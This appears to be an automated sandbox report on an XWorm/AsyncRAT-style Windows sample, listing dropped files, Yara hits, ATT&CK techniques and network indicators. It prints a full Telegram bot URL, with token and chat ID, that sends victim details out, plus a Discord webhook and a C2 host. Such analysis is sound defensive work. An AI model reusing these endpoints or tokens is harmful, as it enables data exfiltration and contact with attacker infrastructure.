                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\Systen UserQueries volume information: C:\Users\user\AppData\Roaming\Systen User VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: adawsfaefasfasfg.exe, 00000002.00000002.2638986605.000000001BF9A000.00000004.00000020.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2631919617.000000001BF20000.00000004.00000020.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2628664918.000000001BF02000.00000004.00000020.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2650967310.000000001CC30000.00000004.00000020.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2675303572.000000001BE47000.00000004.00000020.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2575156399.0000000001231000.00000004.00000020.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2675303572.000000001BE52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\adawsfaefasfasfg.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\wasdwasfwasfs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Source: Yara matchFile source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ozgpPwVAu1.exe PID: 7644, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: adawsfaefasfasfg.exe PID: 7732, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wasdwasfwasfs.exe PID: 7756, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED
                            Source: Yara matchFile source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.2591449977.0000000002F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ozgpPwVAu1.exe PID: 7644, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: adawsfaefasfasfg.exe PID: 7732, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wasdwasfwasfs.exe PID: 7756, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                            Remote Access Functionality

                            barindex
                            Source: Yara matchFile source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ozgpPwVAu1.exe PID: 7644, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: adawsfaefasfasfg.exe PID: 7732, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wasdwasfwasfs.exe PID: 7756, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED
                            Source: Yara matchFile source: 3.0.wasdwasfwasfs.exe.c80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d3e598.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 2.0.adawsfaefasfasfg.exe.eb0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d24b30.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000003.00000002.2591449977.0000000002F05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000002.00000002.2592447973.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.2591449977.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ozgpPwVAu1.exe PID: 7644, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: adawsfaefasfasfg.exe PID: 7732, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: wasdwasfwasfs.exe PID: 7756, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\wasdwasfwasfs.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\adawsfaefasfasfg.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Systen User, type: DROPPED
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting
                            Valid Accounts12
                            Windows Management Instrumentation
                            1
                            Scripting
                            1
                            DLL Side-Loading
                            11
                            Disable or Modify Tools
                            1
                            Input Capture
                            1
                            File and Directory Discovery
                            Remote Services11
                            Archive Collected Data
                            1
                            Web Service
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job
                            1
                            DLL Side-Loading
                            11
                            Process Injection
                            1
                            Deobfuscate/Decode Files or Information
                            LSASS Memory33
                            System Information Discovery
                            Remote Desktop Protocol1
                            Input Capture
                            1
                            Ingress Tool Transfer
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            PowerShell
                            1
                            Scheduled Task/Job
                            1
                            Scheduled Task/Job
                            21
                            Obfuscated Files or Information
                            Security Account Manager451
                            Security Software Discovery
                            SMB/Windows Admin SharesData from Network Shared Drive11
                            Encrypted Channel
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron21
                            Registry Run Keys / Startup Folder
                            21
                            Registry Run Keys / Startup Folder
                            23
                            Software Packing
                            NTDS1
                            Process Discovery
                            Distributed Component Object ModelInput Capture1
                            Non-Standard Port
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading
                            LSA Secrets161
                            Virtualization/Sandbox Evasion
                            SSHKeylogging2
                            Non-Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
                            Masquerading
                            Cached Domain Credentials1
                            Application Window Discovery
                            VNCGUI Input Capture13
                            Application Layer Protocol
                            Data Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items161
                            Virtualization/Sandbox Evasion
                            DCSync1
                            System Network Configuration Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                            Process Injection
                            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570394 Sample: ozgpPwVAu1.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 71 api.telegram.org 2->71 73 carolina-comes.gl.at.ply.gg 2->73 75 ip-api.com 2->75 83 Suricata IDS alerts for network traffic 2->83 85 Found malware configuration 2->85 87 Malicious sample detected (through community Yara rule) 2->87 91 18 other signatures 2->91 9 ozgpPwVAu1.exe 5 2->9         started        13 Systen User 2->13         started        15 OpenWith.exe 2->15         started        17 svchost.exe 2->17         started        signatures3 89 Uses the Telegram API (likely for C&C communication) 71->89 process4 file5 63 C:\Users\user\wasdwasfwasfs.exe, PE32 9->63 dropped 65 C:\Users\user\adawsfaefasfasfg.exe, PE32 9->65 dropped 67 C:\Users\user\PIN CRACKER V2.bat, Unicode 9->67 dropped 69 C:\Users\user\AppData\...\ozgpPwVAu1.exe.log, CSV 9->69 dropped 105 Drops PE files to the user root directory 9->105 107 Creates files with lurking names (e.g. Crack.exe) 9->107 109 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->109 19 adawsfaefasfasfg.exe 15 6 9->19         started        23 wasdwasfwasfs.exe 14 3 9->23         started        26 cmd.exe 1 9->26         started        signatures6 process7 dnsIp8 61 C:\Users\user\AppData\Roaming\Systen User, PE32 19->61 dropped 93 Antivirus detection for dropped file 19->93 95 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->95 97 Protects its processes via BreakOnTermination flag 19->97 103 4 other signatures 19->103 28 powershell.exe 23 19->28         started        31 powershell.exe 19->31         started        33 powershell.exe 19->33         started        45 2 other processes 19->45 77 carolina-comes.gl.at.ply.gg 147.185.221.22, 12886, 49853, 49977 SALSGIVERUS United States 23->77 79 127.0.0.1 unknown unknown 23->79 81 2 other IPs or domains 23->81 99 Machine Learning detection for dropped file 23->99 101 Adds a directory exclusion to Windows Defender 23->101 35 powershell.exe 23->35         started        37 powershell.exe 23->37         started        39 conhost.exe 26->39         started        41 where.exe 1 26->41         started        43 chcp.com 1 26->43         started        file9 signatures10 process11 signatures12 111 Loading BitLocker PowerShell Module 28->111 47 conhost.exe 28->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 conhost.exe 35->53         started        55 conhost.exe 37->55         started        57 conhost.exe 45->57         started        59 conhost.exe 45->59         started        process13

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            ozgpPwVAu1.exe63%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                            ozgpPwVAu1.exe100%AviraTR/Dropper.Gen
                            ozgpPwVAu1.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\adawsfaefasfasfg.exe100%AviraTR/Spy.Gen
                            C:\Users\user\wasdwasfwasfs.exe100%AviraTR/Spy.Gen
                            C:\Users\user\AppData\Roaming\Systen User100%AviraTR/Spy.Gen
                            C:\Users\user\adawsfaefasfasfg.exe100%Joe Sandbox ML
                            C:\Users\user\wasdwasfwasfs.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Systen User100%Joe Sandbox ML
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://www.microsoft.coO0%Avira URL Cloudsafe
                            http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt00%Avira URL Cloudsafe
                            http://www.micom/pki/certs/Miut_2010-06-23.cr0%Avira URL Cloudsafe
                            http://www.microsoft.coj0%Avira URL Cloudsafe
                            147.185.221.220%Avira URL Cloudsafe
                            http://osoft.co0%Avira URL Cloudsafe
                            http://crl.micro/pki/crl/productCerAut_2010-06-20%Avira URL Cloudsafe
                            http://www.micom/pkiops/Docs/ry.htm00%Avira URL Cloudsafe
                            https://api.telegrP0%Avira URL Cloudsafe
                            carolina-comes.gl.at.ply.gg100%Avira URL Cloudmalware
                            http://www.microsoft.$0%Avira URL Cloudsafe
                            http://crl.v0%Avira URL Cloudsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            carolina-comes.gl.at.ply.gg
                            147.185.221.22
                            truetrue
                              unknown
                              ip-api.com
                              208.95.112.1
                              truefalse
                                high
                                s-part-0035.t-0009.t-msedge.net
                                13.107.246.63
                                truefalse
                                  high
                                  api.telegram.org
                                  149.154.167.220
                                  truefalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE3C0EEEB514F72781BA2%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ELOET%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2false
                                      high
                                      147.185.221.22true
                                      • Avira URL Cloud: safe
                                      unknown
                                      carolina-comes.gl.at.ply.ggtrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      127.0.0.1false
                                        high
                                        http://ip-api.com/line/?fields=hostingfalse
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0powershell.exe, 0000000E.00000002.1820911519.0000013FE7850000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=75388adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003180000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1470720955.000002853FD37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1761595477.0000013FDF314000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1750246959.0000012AEDCC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2055474118.0000017199AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.orgadawsfaefasfasfg.exe, 00000002.00000002.2592447973.0000000003184000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/botozgpPwVAu1.exe, 00000000.00000002.1326803778.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, adawsfaefasfasfg.exe, 00000002.00000000.1322668659.0000000000EB2000.00000002.00000001.01000000.00000006.sdmp, adawsfaefasfasfg.exe, 00000002.00000002.2592447973.00000000030CA000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000002.2591449977.0000000002EEA000.00000004.00000800.00020000.00000000.sdmp, wasdwasfwasfs.exe, 00000003.00000000.1323412676.0000000000C82000.00000002.00000001.01000000.00000007.sdmp, adawsfaefasfasfg.exe.0.dr, wasdwasfwasfs.exe.0.dr, Systen User.2.drfalse
                                                    high
                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1413749213.0000015D62429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1412534773.000002852FEE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1555270609.0000013FCF4C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1551198166.0000012ADDE79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1878175975.0000017189C9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.microsoft.coOpowershell.exe, 00000016.00000002.2393163849.000001286FE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000009.00000002.1492888192.00000285480D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crl.micro/pki/crl/productCerAut_2010-06-2powershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.microsoft.copowershell.exe, 0000000E.00000002.1823526191.0000013FE78E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2396145614.0000012870040000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Licensepowershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.micpowershell.exe, 00000010.00000002.1807879075.0000012AF6474000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contoso.com/Iconpowershell.exe, 00000016.00000002.2345723056.00000128678CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://osoft.copowershell.exe, 0000000E.00000002.1823526191.0000013FE78E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://discordapp.com/api/webhooks/1309170780696870912/8yNfzeRdjxyYLYxaut1-j0gdfkndb6ZneH0LI8EP6wjxwhere.exe, 00000007.00000002.1328741520.0000028CA97B4000.00000004.00000020.00020000.00000000.sdmp, PIN CRACKER V2.bat.0.drfalse
                                                                  high
                                                                  http://www.micom/pki/certs/Miut_2010-06-23.crpowershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000016.00000002.2136055333.0000012857A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://discord.gg/2e8UXZp2FqPIN CRACKER V2.bat.0.drfalse
                                                                      high
                                                                      http://www.microsoft.cojpowershell.exe, 00000009.00000002.1497525479.000002854858D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://crl.micropowershell.exe, 00000008.00000002.1498209916.0000015D7A900000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://g.live.com/odclientsettings/Prod-C:qmgr.db.31.drfalse
                                                                          high
